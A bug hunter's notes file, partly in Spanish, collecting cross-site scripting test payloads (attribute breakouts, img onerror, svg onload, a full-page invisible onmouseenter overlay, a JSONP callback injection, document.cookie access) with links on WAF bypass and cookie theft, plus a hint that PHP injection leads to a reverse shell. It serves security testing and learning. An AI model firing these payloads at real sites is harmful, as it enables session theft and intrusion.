Algunos Xss alerts para probar
https://www.youtube.com/watch?v=eQFbG6CwwdI
https://portswigger.net/support/xss-beating-html-sanitizing-filters
https://melotover.medium.com/how-i-bypassed-a-tough-waf-to-steal-user-cookies-using-xss-da75f28108e4
así no:
<input type="text" name="cn" size="20" maxlength="20" value="<script>alert(1);</script>"> así sí:<input type="text" name="cn" size="20" maxlength="20" value=""><script>alert(1)</script>"> <input type="text" name="cn" size="20" maxlength="20" value="" onmouseenter="alert(1)" x="">" onmouseenter="alert(1)" style="display:block;position:absolute;top:0;left:0;width:50000px;height:50000px;z-index:999999;
This then becomes:
<input type="text" name="cn" size="20" maxlength="20" value="" onmouseenter="alert(1)" style="display:block;position:absolute;top:0;left:0;width:50000px;height:50000px;z-index:999999;">
The style here looks like a mouthful but it's quite simple:
- Make the element display as a block element (so we can size it arbitrarily)
- Make the element's position absolute within the window (so we can set its position to anywhere)
- Move the element to (0,0)
- Make the element completely fill the page (so the user's mouse has to enter it!)
- Make the element appear on top of everything else.
Xss:
javascript:alert(document.cookie)
<img src=1 onerror=alert(1)>
product?productId=1&storeId="></select><img%20src=1%20onerror=alert(1)>
https://site.com/out?callback=anything&callback=%22;alert%60XSS_POC_BY_SAAJAN_BHUJEL%60;%2f%2f
I tested with <s>strikethrough?</s> and HTML Injection successfully worked.
Then I tried the basic XSS Payload(<script>alert(1)</script>)
But a WAF was in place…
<div onpointerover=”alert(‘XSS POC by mrsinister15’)”>Please put your mouse on me to see the magic ;)</div><svg/onload=alert(1)>
In the best scenario, you should also try to inject PHP code. For
example with <?php echo(1); ?> . If the payload works and the
output: 1 . You could get a reverse shell to get RCE. Really easy way to
get RCE on .php file if it works
